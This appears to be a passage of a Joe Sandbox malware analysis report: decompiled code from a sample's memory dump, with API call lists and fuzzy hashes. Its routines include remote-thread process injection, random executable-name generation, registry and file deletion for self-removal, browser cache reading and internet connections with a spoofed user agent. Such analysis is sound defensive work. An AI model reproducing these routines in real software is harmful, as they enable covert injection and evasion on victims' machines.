            						SetLastError(0x2ee4);
            						goto L22;
            					}
            					_t106 =  *_a4;
            					_t71 = E0040BDA6( *_a4);
            					if(_t71 == 0xffffffff) {
            						E00410418(_v12);
            						goto L21;
            					}
            					_t96 = _t71 * 0x24 +  *0x41aa78;
            					_t102 = E004123BD( &_v24, _t106);
            					if(E004072B2( *((intOrPtr*)(_t96 + 0x10)),  *(_t96 + 0xc), _t75,  &_v12,  &_v20) != 0) {
            						_t84 = E0041065D(_v24, 0, _t102);
            						_a4 = _t84;
            						if(_t84 != 0) {
            							_v28 = 0x1000;
            							_t108 = E004103ED(0x1000);
            							if(_t108 != 0) {
            								 *_t108 = 0x50;
            								if(GetUrlCacheEntryInfoW(_a4, _t108,  &_v28) != 0) {
            									_t91 =  *((intOrPtr*)(_t108 + 8));
            									if(_t91 != 0 &&  *_t91 != 0) {
            										E004156EB(_t91, _v12, _v20);
            									}
            								}
            								E00410418(_t108);
            							}
            							E00410418(_a4);
            						}
            					}
            					E00410418(_t102);
            					 *((intOrPtr*)(_t96 + 0x14)) = _v12;
            					 *((intOrPtr*)(_t96 + 0x18)) = _v20;
            					goto L22;
            				} else {
            					 *_t100 =  *((intOrPtr*)(_t96 + 0x20));
            					L34:
            					goto L35;
            				}
            			}

            APIs
            • EnterCriticalSection.KERNEL32(0041AA60), ref: 0040C556
            • LeaveCriticalSection.KERNEL32(0041AA60), ref: 0040C5BB
            • EnterCriticalSection.KERNEL32(0041AA60), ref: 0040C5D8
            • GetUrlCacheEntryInfoW.WININET(?,00000000,000000FF), ref: 0040C65C
            • SetLastError.KERNEL32(00002EE4), ref: 0040C6B2
            • LeaveCriticalSection.KERNEL32(0041AA60), ref: 0040C71C
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CriticalSection$EnterLeave$CacheEntryErrorInfoLast
            • String ID:
            • API String ID: 3653105453-0
            • Opcode ID: 31b576822a17ba58cefcf064c13028beecb23524f36e3e058db64614a3383146
            • Instruction ID: 449e02f05eb19b1f70c25671eff6cca34a9ed6d16babb17d36dbc8411e6a768b
            • Opcode Fuzzy Hash: 31b576822a17ba58cefcf064c13028beecb23524f36e3e058db64614a3383146
            • Instruction Fuzzy Hash: D7518131900209EBDB21DFA5C884B9E77B4EF05364F14466AF814BB2D1D778D990CFA9
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 68%
            			E0040C423(intOrPtr* __edi, intOrPtr _a4, void* _a8, intOrPtr* _a12) {
            				intOrPtr _v28;
            				signed int _v44;
            				void* _v52;
            				intOrPtr _v56;
            				char _v61;
            				intOrPtr _v64;
            				signed int _v72;
            				intOrPtr _v76;
            				char _v77;
            				intOrPtr _v84;
            				intOrPtr _v85;
            				char _v89;
            				void* __esi;
            				void* _t30;
            				intOrPtr _t31;
            				void** _t36;
            				intOrPtr _t43;
            				intOrPtr* _t57;
            				intOrPtr _t61;
            				intOrPtr* _t62;
            				intOrPtr _t64;
            
            				_t62 = __edi;
            				ResetEvent(_a8);
            				_t30 = HeapAlloc( *0x41bc68, 8, 0x1004);
            				_t64 = 0;
            				_v52 = _t30;
            				if(_t30 != 0) {
            					_t57 = __imp__InternetSetStatusCallbackW;
            					_t31 =  *_t57(_a4, E0040C3DA);
            					_t61 = 0x28;
            					_v56 = _t31;
            					 *_a12 = 0;
            					 *__edi = 0;
            					_v61 = 1;
            					E004104CB( &_v52,  &_v52, 0, _t61);
            					_v64 = _t61;
            					_v44 = _v72;
            					while(1) {
            						L3:
            						_t36 =  &_v52;
            						_v28 = 0x1000;
            						__imp__InternetReadFileExA(_a4, _t36, 8, _t64);
            						if(_t36 == 0) {
            							break;
            						}
            						if(_v44 != _t64) {
            							_t66 = _a12;
            							if(E004103A8( *_t62 + _v44, _a12) == 0) {
            								L9:
            								_v77 = 0;
            							} else {
            								E00410454( *_t66 +  *_t62, _v76, _v44);
            								 *_t62 =  *_t62 + _v56;
            								_t64 = 0;
            								continue;
            							}
            						}
            						L10:
            						asm("sbb eax, eax");
            						 *_t57(_a4,  ~(_v72 + 1) & _v72);
            						E00410418(_v84);
            						if(_v89 == 0) {
            							E00410418( *_a12);
            						}
            						_t43 = _v85;
            						goto L13;
            					}
            					if(GetLastError() != 0x3e5) {
            						goto L9;
            					} else {
            						E004139F3( &_a8);
            						goto L3;
            					}
            					goto L10;
            				} else {
            					E00410418(0);
            					_t43 = 0;
            				}
            				L13:
            				return _t43;
            			}
            0x0040c423
            0x0040c431
            0x0040c444
            0x0040c44a
            0x0040c44c
            0x0040c452
            0x0040c461
            0x0040c46f
            0x0040c473
            0x0040c474
            0x0040c47c
            0x0040c484
            0x0040c486
            0x0040c48b
            0x0040c494
            0x0040c498
            0x0040c49c
            0x0040c49c
            0x0040c49f
            0x0040c4a7
            0x0040c4af
            0x0040c4b7
            0x00000000
            0x00000000
            0x0040c4d5
            0x0040c4dd
            0x0040c4e7
            0x0040c507
            0x0040c507
            0x0040c4e9
            0x0040c4f8
            0x0040c501
            0x0040c503
            0x00000000
            0x0040c503
            0x0040c4e7
            0x0040c50c
            0x0040c513
            0x0040c51d
            0x0040c523
            0x0040c52d
            0x0040c534
            0x0040c534
            0x0040c539
            0x00000000
            0x0040c539
            0x0040c4c4
            0x00000000
            0x0040c4c6
            0x0040c4ca
            0x00000000
            0x0040c4ca
            0x00000000
            0x0040c454
            0x0040c455
            0x0040c45a
            0x0040c45a
            0x0040c53d
            0x0040c542

            APIs
            • ResetEvent.KERNEL32(?), ref: 0040C431
            • HeapAlloc.KERNEL32(00000008,00001004), ref: 0040C444
            • InternetSetStatusCallbackW.WININET(?,0040C3DA), ref: 0040C46F
            • InternetReadFileExA.WININET ref: 0040C4AF
            • GetLastError.KERNEL32 ref: 0040C4B9
            • InternetSetStatusCallbackW.WININET(?,?), ref: 0040C51D
              • Part of subcall function 00410418: HeapFree.KERNEL32(00000000,00000000,00411C0D,00000000,?,?,?,?,0040373A,00000000,00403AF4), ref: 0041042B
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Internet$CallbackHeapStatus$AllocErrorEventFileFreeLastReadReset
            • String ID:
            • API String ID: 3721613131-0
            • Opcode ID: bc5be74c2d3f0849fea5ea65deb86554f169fcf8a3e246ba13cca90e3934a72f
            • Instruction ID: 51218edfded8628c0f13d9cfe365777ade482511a04aaaec4305afa1e3e0c7c1
            • Opcode Fuzzy Hash: bc5be74c2d3f0849fea5ea65deb86554f169fcf8a3e246ba13cca90e3934a72f
            • Instruction Fuzzy Hash: 87317A71104355EBDB01DF64DC81AAEBBE8FF48704F00492AF984E72A0D774D994DB9A
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 79%
            			E00405A73(void* __ebx, void* __ecx, void* __eflags) {
            				char _v1168;
            				char _v1668;
            				char _v1680;
            				short _v1688;
            				char _v2192;
            				short _v2208;
            				char _v2720;
            				char _v2728;
            				char _v2992;
            				char _v3072;
            				void* __edi;
            				void* __esi;
            				WCHAR* _t50;
            				WCHAR* _t51;
            				WCHAR* _t52;
            				void* _t65;
            
            				_t65 = __eflags;
            				_t46 = __ecx;
            				_t50 =  &_v1668;
            				E00403ED1(__ecx, _t50, 1);
            				PathRemoveFileSpecW(_t50);
            				_t51 =  &_v2192;
            				E00403ED1(_t46, _t51, 2);
            				PathRemoveFileSpecW(_t51);
            				 *0x41a290 =  *0x41a290 | 0x00000002;
            				_push(0);
            				E00405009();
            				E004048ED(_t46, _t65);
            				E00415B2D( &_v1680, _t65);
            				E00415B2D(_t51, _t65);
            				_t52 =  &_v2720;
            				E00403ED1(_t51, _t52, 3);
            				SHDeleteKeyW(0x80000001, _t52);
            				CharToOemW( &_v1688,  &_v2728);
            				CharToOemW( &_v2208,  &_v2992);
            				_t53 =  &_v3072;
            				E0040F333(0xa8,  &_v3072);
            				_push( &_v2992);
            				_push( &_v2728);
            				_push( &_v2992);
            				_push( &_v2728);
            				if(E004111E9( &_v3072, 0x474,  &_v1168, _t53) > 0) {
            					E00414AF8(__ebx, 0x474,  &_v1168);
            				}
            				if( *0x41a75c == 0xffffffff) {
            					ExitProcess(0);
            				}
            				return 1;
            			}
            0x00405a73
            0x00405a73
            0x00405a83
            0x00405a8a
            0x00405a98
            0x00405a9c
            0x00405aa3
            0x00405aab
            0x00405aad
            0x00405ab4
            0x00405ab6
            0x00405abb
            0x00405ac7
            0x00405ace
            0x00405ad5
            0x00405adc
            0x00405ae9
            0x00405b05
            0x00405b14
            0x00405b16
            0x00405b1f
            0x00405b28
            0x00405b30
            0x00405b35
            0x00405b3d
            0x00405b57
            0x00405b5c
            0x00405b5c
            0x00405b68
            0x00405b6c
            0x00405b6c
            0x00405b79

            APIs
              • Part of subcall function 00403ED1: PathRenameExtensionW.SHLWAPI(?,.dat,?,0041A2F0,00000000,00000032,?,774B9EB0,00000000), ref: 00403F4A
            • PathRemoveFileSpecW.SHLWAPI(?,00000001), ref: 00405A98
            • PathRemoveFileSpecW.SHLWAPI(?,00000002), ref: 00405AAB
              • Part of subcall function 00405009: SetEvent.KERNEL32(00405ABB,00000000), ref: 0040500F
              • Part of subcall function 00405009: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00405022
              • Part of subcall function 004048ED: SHDeleteValueW.SHLWAPI(80000001,?,?,FF220823,?,00000000), ref: 0040492C
              • Part of subcall function 004048ED: Sleep.KERNEL32(000001F4), ref: 0040493B
              • Part of subcall function 004048ED: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?), ref: 00404951
              • Part of subcall function 00415B2D: FindFirstFileW.KERNEL32(?,?,?,?), ref: 00415B5E
              • Part of subcall function 00415B2D: FindNextFileW.KERNEL32(00000000,?), ref: 00415BB9
              • Part of subcall function 00415B2D: FindClose.KERNEL32(00000000), ref: 00415BC4
              • Part of subcall function 00415B2D: SetFileAttributesW.KERNEL32(?,00000080,?,?), ref: 00415BD0
              • Part of subcall function 00415B2D: RemoveDirectoryW.KERNEL32(?), ref: 00415BD7
            • SHDeleteKeyW.SHLWAPI(80000001,?,00000003,00000000), ref: 00405AE9
            • CharToOemW.USER32 ref: 00405B05
            • CharToOemW.USER32 ref: 00405B14
            • ExitProcess.KERNEL32 ref: 00405B6C
              • Part of subcall function 00414AF8: CharToOemW.USER32 ref: 00414B28
              • Part of subcall function 00414AF8: GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 00414BAC
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: File$CharFindPathRemove$DeleteSpec$AttributesCloseDirectoryEnvironmentEventExitExtensionFirstNextObjectOpenProcessRenameSingleSleepValueVariableWait
            • String ID:
            • API String ID: 1572960351-0
            • Opcode ID: 667e52e821f6ade57f5350bf338662d76f76dc4f1b2334bf992ec4b5f87f0ac7
            • Instruction ID: bdf439bfd47097f2aefded403e01c0f9100f040fec6a77e3ddc6b90bc8dc270a
            • Opcode Fuzzy Hash: 667e52e821f6ade57f5350bf338662d76f76dc4f1b2334bf992ec4b5f87f0ac7
            • Instruction Fuzzy Hash: D02144726083485BC220A7A5DC06FDB779CEBC4315F004A3BB559E7191DB74B605CBA6
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 74%
            			E00415750(signed int __eax, void* __ecx, void** __esi, long _a4) {
            				intOrPtr _v8;
            				long _v12;
            				void* _t19;
            				void* _t20;
            				long _t22;
            				void* _t23;
            
            				_t33 = __esi;
            				asm("sbb eax, eax");
            				_t19 = CreateFileW(_a4, 0x80000000,  ~(__eax & 2) & 0x00000006 | 0x00000001, 0, 3, 0, 0);
            				__esi[2] = _t19;
            				if(_t19 == 0xffffffff) {
            					L11:
            					_t20 = 0;
            				} else {
            					__imp__GetFileSizeEx(_t19,  &_v12);
            					if(_t19 == 0 || _v8 != 0) {
            						L10:
            						CloseHandle(_t33[2]);
            						goto L11;
            					} else {
            						_t22 = _v12;
            						__esi[1] = _t22;
            						if(_t22 != 0) {
            							_t23 = VirtualAlloc(0, _t22, 0x3000, 4);
            							 *__esi = _t23;
            							if(_t23 == 0) {
            								goto L10;
            							} else {
            								if(ReadFile(__esi[2], _t23, __esi[1],  &_a4, 0) == 0 || _a4 != __esi[1]) {
            									VirtualFree( *_t33, 0, 0x8000);
            									goto L10;
            								} else {
            									goto L5;
            								}
            							}
            						} else {
            							 *__esi = 0;
            							L5:
            							_t20 = 1;
            						}
            					}
            				}
            				return _t20;
            			}
            0x00415750
            0x00415763
            0x00415775
            0x0041577b
            0x00415781
            0x004157f1
            0x004157f1
            0x00415783
            0x00415788
            0x00415790
            0x004157e8
            0x004157eb
            0x00000000
            0x00415797
            0x00415797
            0x0041579a
            0x0041579f
            0x004157b0
            0x004157b6
            0x004157ba
            0x00000000
            0x004157bc
            0x004157d0
            0x004157e2
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x004157d0
            0x004157a1
            0x004157a1
            0x004157a3
            0x004157a3
            0x004157a3
            0x0041579f
            0x00415790
            0x004157f5

            APIs
            • CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000,?,?,?,?,004043B8,?,?,00000000), ref: 00415775
            • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,004043B8,?,?,00000000), ref: 00415788
            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,004043B8,?,?,00000000), ref: 004157B0
            • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,004043B8,?,?,00000000), ref: 004157C8
            • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,004043B8,?,?,00000000), ref: 004157E2
            • CloseHandle.KERNEL32(?,?,?,?,?,004043B8,?,?,00000000), ref: 004157EB
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: File$Virtual$AllocCloseCreateFreeHandleReadSize
            • String ID:
            • API String ID: 1974014688-0
            • Opcode ID: ee597b01b564d360fb9ed8a38f813798c6c22935557b3bb386b8af7ad68ce328
            • Instruction ID: 0d1357fd9c704406456672e850e71acf68a2448e1a94e8e13560d536ac837753
            • Opcode Fuzzy Hash: ee597b01b564d360fb9ed8a38f813798c6c22935557b3bb386b8af7ad68ce328
            • Instruction Fuzzy Hash: 97119375100600FFDB248F61CC4AEEB7BE8EB85700F10452EF5A6E51A0D774A981CB28
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 86%
            			E00404C7D(void* __ecx, long _a4, intOrPtr _a8) {
            				char _v5;
            				void* __edi;
            				void* __esi;
            				void* _t10;
            				void* _t14;
            				void* _t23;
            				void* _t25;
            				void* _t26;
            
            				_t21 = __ecx;
            				_push(__ecx);
            				_v5 = 0;
            				_t23 = OpenProcess(0x47a, 0, _a4);
            				_t28 = _t23;
            				if(_t23 != 0) {
            					_push(_t25);
            					_t10 = E00403D3B(_t21, _t23, _t25, _t28, _a8, 0);
            					_t26 = _t10;
            					if(_t26 != 0) {
            						_t14 = CreateRemoteThread(_t23, 0, 0, _t10 -  *0x41a2a4 + E00404388, 0, 0, 0);
            						_a4 = _t14;
            						if(_t14 == 0) {
            							VirtualFreeEx(_t23, _t26, 0, 0x8000);
            						} else {
            							WaitForSingleObject(_t14, 0x2710);
            							CloseHandle(_a4);
            							_v5 = 1;
            						}
            					}
            					CloseHandle(_t23);
            				}
            				return _v5;
            			}
            0x00404c7d
            0x00404c80
            0x00404c8e
            0x00404c97
            0x00404c99
            0x00404c9b
            0x00404c9d
            0x00404ca2
            0x00404ca7
            0x00404cab
            0x00404cbf
            0x00404cc5
            0x00404cca
            0x00404cef
            0x00404ccc
            0x00404cd2
            0x00404cdb
            0x00404ce1
            0x00404ce1
            0x00404cca
            0x00404cf6
            0x00404cfc
            0x00404d03

            APIs
            • OpenProcess.KERNEL32(0000047A,00000000,?,00000000,7620F560,?,?,00404E33,?,?,00000000,?,?,00000000), ref: 00404C91
            • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,-0081E62C,00000000,00000000,00000000), ref: 00404CBF
            • WaitForSingleObject.KERNEL32(00000000,00002710,?,00404E33,?,?,00000000,?,?,00000000), ref: 00404CD2
            • CloseHandle.KERNEL32(?,?,00404E33,?,?,00000000,?,?,00000000), ref: 00404CDB
            • VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000,?,00404E33,?,?,00000000,?,?,00000000), ref: 00404CEF
            • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00404E33,?,?,00000000,?,?,00000000), ref: 00404CF6
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CloseHandle$CreateFreeObjectOpenProcessRemoteSingleThreadVirtualWait
            • String ID:
            • API String ID: 14861764-0
            • Opcode ID: 6e09c2a8d2113ed3128d9d208b262baed39e57be5c534c9894ced9e3061a944f
            • Instruction ID: f27d6e2c6b3d4ec6edb13dee8cda7b7768f6462915a5855c365f17cb714c63cb
            • Opcode Fuzzy Hash: 6e09c2a8d2113ed3128d9d208b262baed39e57be5c534c9894ced9e3061a944f
            • Instruction Fuzzy Hash: 7C0175B2104148BFE7012BA49DCCDBF3EACDB89395B054079FB02B6161C6794D459679
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E0041471A(signed int __eax, signed int __ecx, void* __eflags, signed int _a4, signed short* _a8) {
            				signed int _v8;
            				signed int _v12;
            				signed int _v16;
            				signed int _v20;
            				intOrPtr _v24;
            				char* _v28;
            				char* _v32;
            				signed int _t56;
            				WCHAR* _t57;
            				short* _t59;
            				signed short _t72;
            				char* _t78;
            				signed int _t85;
            				signed short* _t86;
            				signed int _t88;
            				intOrPtr _t89;
            				void* _t90;
            
            				_t88 = E0041185E(__eax & 0x000000ff, __ecx & 0x000000ff);
            				_v16 = _t88;
            				_t56 = E00411812();
            				_t78 = "bcdfghklmnpqrstvwxz";
            				if((_t56 & 0x00000100) == 0) {
            					_v32 = "aeiouy";
            					_v28 = _t78;
            				} else {
            					_v32 = _t78;
            					_v28 = "aeiouy";
            				}
            				_t85 = 0;
            				_v12 = 0;
            				_v8 = 0;
            				if(_t88 > 0) {
            					_v20 = _a4 & 0x00000004;
            					do {
            						if(_v8 == 2) {
            							if((E00411812() & 0x00000100) == 0) {
            								_v32 = "aeiouy";
            								_v28 = _t78;
            							} else {
            								_v32 = _t78;
            								_v28 = "aeiouy";
            							}
            							_v8 = _v8 & 0x00000000;
            						}
            						_t89 =  *((intOrPtr*)(_t90 + _v8 * 4 - 0x1c));
            						_v24 = ((0 | _t89 != _t78) - 0x00000001 & 0x0000000d) + 6;
            						if(_v20 == 0 || _t85 - _v12 <= 1 || (E00411812() & 0x00000101) != 0x101) {
            							_t72 =  *((char*)(E0041185E(_v24 - 1, 0) + _t89));
            						} else {
            							_t72 = 0x20;
            							_v12 = _t85;
            						}
            						_a8[_t85] = _t72;
            						_t85 = _t85 + 1;
            						_v8 = _v8 + 1;
            					} while (_t85 < _v16);
            					_t88 = _v16;
            				}
            				if((_a4 & 0x00000004) == 0 || _t88 <= 0) {
            					_t86 = _a8;
            				} else {
            					_t86 = _a8;
            					_t59 = _t86 + _t88 * 2 - 2;
            					while( *_t59 == 0x20) {
            						_t88 = _t88 - 1;
            						_t59 = _t59;
            						if(_t88 > 0) {
            							continue;
            						} else {
            						}
            						goto L24;
            					}
            				}
            				L24:
            				_t57 = 0;
            				_t86[_t88] = 0;
            				if((_a4 & 0x00000002) != 0) {
            					_t57 = CharUpperW( *_t86 & 0x0000ffff);
            					 *_t86 = 0;
            				}
            				return _t57;
            			}
            0x0041472f
            0x00414731
            0x00414734
            0x00414739
            0x00414743
            0x00414751
            0x00414758
            0x00414745
            0x00414745
            0x00414748
            0x00414748
            0x0041475b
            0x0041475d
            0x00414760
            0x00414765
            0x00414771
            0x00414774
            0x00414778
            0x00414784
            0x00414792
            0x00414799
            0x00414786
            0x00414786
            0x00414789
            0x00414789
            0x0041479c
            0x0041479c
            0x004147a3
            0x004147b9
            0x004147bc
            0x004147ed
            0x004147da
            0x004147dc
            0x004147dd
            0x004147dd
            0x004147f5
            0x004147f9
            0x004147fa
            0x004147fd
            0x00414806
            0x00414806
            0x0041480d
            0x00414829
            0x00414813
            0x00414813
            0x00414816
            0x0041481a
            0x00414820
            0x00414822
            0x00414825
            0x00000000
            0x00000000
            0x00414827
            0x00000000
            0x00414825
            0x0041481a
            0x0041482c
            0x0041482c
            0x00414832
            0x00414836
            0x0041483c
            0x00414842
            0x00414842
            0x00414849

            APIs
              • Part of subcall function 00411812: GetTickCount.KERNEL32 ref: 00411812
            • CharUpperW.USER32(00000000,?,.exe,00000000,00000000), ref: 0041483C
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CharCountTickUpper
            • String ID: .exe$aeiouy$bcdfghklmnpqrstvwxz$3@
            • API String ID: 2674899715-2705927624
            • Opcode ID: 6cae42146436ed9b1862f147593c66c1629bff61a5de4005452ac910b6e288e9
            • Instruction ID: ad0e179f644eefb186cb14b873178787c0144a13075521483b84674fb271e9e1
            • Opcode Fuzzy Hash: 6cae42146436ed9b1862f147593c66c1629bff61a5de4005452ac910b6e288e9
            • Instruction Fuzzy Hash: 1441A075D002599BCB10EF95C0852FEBBB4FF84305F20806BD961AB280D7799A81CB99
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 71%
            			E0040F504(void* _a4, WCHAR* _a8) {
            				char _v5;
            				char _v44;
            				char _v164;
            				char _v684;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				void** _t14;
            				void* _t19;
            				void* _t26;
            				long _t29;
            				void* _t36;
            				WCHAR* _t40;
            
            				_t14 =  &_a4;
            				_push(_t14);
            				_push(_a4);
            				_v5 = 0;
            				L00416BA4();
            				if(_t14 != 0) {
            					_t43 =  &_v164;
            					E0040F369(0xa5,  &_v164);
            					_push(_a4);
            					_t40 =  &_v684;
            					_t19 = E004111A5( &_v164, 0x104, _t40, _t43);
            					_pop(_t36);
            					if(_t19 > 0) {
            						E0040F369(0xa6,  &_v44);
            						_t26 = E004143B6(0x80000002, 0x104, _t36, _t40, _t40,  &_v44);
            						if(_t26 != 0 && _t26 != 0xffffffff) {
            							PathUnquoteSpacesW(_t40);
            							_t29 = ExpandEnvironmentStringsW(_t40, _a8, 0x104);
            							asm("sbb al, al");
            							_v5 = _t29 - 1 + 1;
            						}
            					}
            					LocalFree(_a4);
            				}
            				return _v5;
            			}
            0x0040f50d
            0x0040f510
            0x0040f511
            0x0040f514
            0x0040f518
            0x0040f51f
            0x0040f528
            0x0040f533
            0x0040f538
            0x0040f545
            0x0040f54b
            0x0040f551
            0x0040f554
            0x0040f55c
            0x0040f56c
            0x0040f573
            0x0040f57d
            0x0040f58a
            0x0040f596
            0x0040f59a
            0x0040f59a
            0x0040f573
            0x0040f5a0
            0x0040f5a8
            0x0040f5ad

            APIs
            • ConvertSidToStringSidW.ADVAPI32(?,?), ref: 0040F518
            • LocalFree.KERNEL32(?,.exe,00000000,00000000), ref: 0040F5A0
              • Part of subcall function 004143B6: RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000001,00000000,?,?,0040F571,?,00000017,.exe,00000000,00000000), ref: 004143C9
            • PathUnquoteSpacesW.SHLWAPI(?,?,00000017,.exe,00000000,00000000), ref: 0040F57D
            • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 0040F58A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: ConvertEnvironmentExpandFreeLocalOpenPathSpacesStringStringsUnquote
            • String ID: .exe
            • API String ID: 2200435814-4119554291
            • Opcode ID: 3d3a5ffcd089b925b0521f9b2b386f08974a583d4f03015875c519858c0bc982
            • Instruction ID: b09d30a59428e7d94231bb48e8c656f9be3abaabfb92e1b6a89a881d97c16066
            • Opcode Fuzzy Hash: 3d3a5ffcd089b925b0521f9b2b386f08974a583d4f03015875c519858c0bc982
            • Instruction Fuzzy Hash: 1511A3357041187FDF20AB79DC48ADE7BACEF45364F004176B848E26A2CB38D94AC765
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00411E55(signed int __eax, char* __ecx) {
            				short _v28;
            				char* _v32;
            				signed int _t5;
            				void* _t12;
            				void* _t14;
            				char* _t15;
            				void* _t18;
            
            				_t15 = __ecx;
            				_t5 = __eax;
            				if(__ecx == 0) {
            					_t15 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)";
            				}
            				_t14 = InternetOpenA(_t15,  !_t5 & 0x00000001, 0, 0, 0);
            				if(_t14 == 0) {
            					L7:
            					return 0;
            				}
            				_t18 = 0;
            				do {
            					_t1 = _t18 + 0x41a00c; // 0x41a00c
            					_t2 = _t18 + 0x41a008; // 0x2
            					InternetSetOptionA(_t14,  *_t2, _t1, 4);
            					_t18 = _t18 + 8;
            				} while (_t18 < 0x18);
            				_t12 = InternetConnectA(_t14, _v32, _v28, 0, 0, 3, 0, 0);
            				if(_t12 == 0) {
            					InternetCloseHandle(_t14);
            					goto L7;
            				}
            				return _t12;
            			}
            0x00411e55
            0x00411e55
            0x00411e5b
            0x00411e5d
            0x00411e5d
            0x00411e72
            0x00411e76
            0x00411eba
            0x00000000
            0x00411eba
            0x00411e79
            0x00411e7b
            0x00411e7d
            0x00411e84
            0x00411e8b
            0x00411e91
            0x00411e94
            0x00411ea8
            0x00411eb1
            0x00411eb4
            0x00000000
            0x00411eb4
            0x00411ebe

            APIs
            • InternetOpenA.WININET(?,?,00000000,00000000,00000000), ref: 00411E6C
            • InternetSetOptionA.WININET(00000000,00000002,0041A00C,00000004), ref: 00411E8B
            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00411EA8
            • InternetCloseHandle.WININET(00000000), ref: 00411EB4
            Strings
            • Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1), xrefs: 00411E5D, 00411E6B
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Internet$CloseConnectHandleOpenOption
            • String ID: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)
            • API String ID: 910987326-3737944857
            • Opcode ID: 34711a5b39f0aadf863cbd871282b2d53fd9348694ca647a57004c5ba28257dd
            • Instruction ID: 7ae4eff06b244a024871c8cfa537538ebb1f25328139bafa5aa076e5744cb1fb
            • Opcode Fuzzy Hash: 34711a5b39f0aadf863cbd871282b2d53fd9348694ca647a57004c5ba28257dd
            • Instruction Fuzzy Hash: D5F096721003007BE7215BA15C8CDAB7E6DEBCDB65B04052DFE56E1031D1358890877C
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 54%
            			E004122CD() {
            				char _v8;
            				struct HINSTANCE__* _v12;
            				void* _v1036;
            				struct HINSTANCE__* _t13;
            				_Unknown_base(*)()* _t15;
            				char _t22;
            				void* _t28;
            
            				_t22 = 0;
            				_t13 = LoadLibraryA("urlmon.dll");
            				_v12 = _t13;
            				if(_t13 != 0) {
            					_t15 = GetProcAddress(_t13, "ObtainUserAgentString");
            					if(_t15 != 0) {
            						_push( &_v8);
            						_push( &_v1036);
            						_push(0);
            						_v8 = 0x3ff;
            						_v1036 = 0;
            						if( *_t15() == 0) {
            							if(_v8 > 0x3ff) {
            								_v8 = 0x3ff;
            							}
            							 *((char*)(_t28 + _v8 - 0x408)) = _t22;
